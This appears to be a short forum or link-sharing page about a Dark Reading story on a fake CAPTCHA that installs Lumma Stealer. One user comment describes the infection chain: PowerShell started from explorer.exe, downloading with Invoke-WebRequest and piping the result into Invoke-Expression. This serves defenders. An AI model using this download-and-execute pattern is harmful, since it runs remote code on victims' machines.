Tricky CAPTCHA Caught Dropping Lumma Stealer Malware
Tricky CAPTCHA Caught Dropping Lumma Stealer Malware
www.darkreading.com
Tricky CAPTCHA Caught Dropping Lumma Stealer Malware
1 comments
Tricky CAPTCHA Caught Dropping Lumma Stealer Malware
Tricky CAPTCHA Caught Dropping Lumma Stealer Malware
Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an
Invoke-WebRequestpiping the download into anInvoke-Expression(usually the shorteriexalias). No .lnk or .js file involved. Just explorer, PowerShell, infected.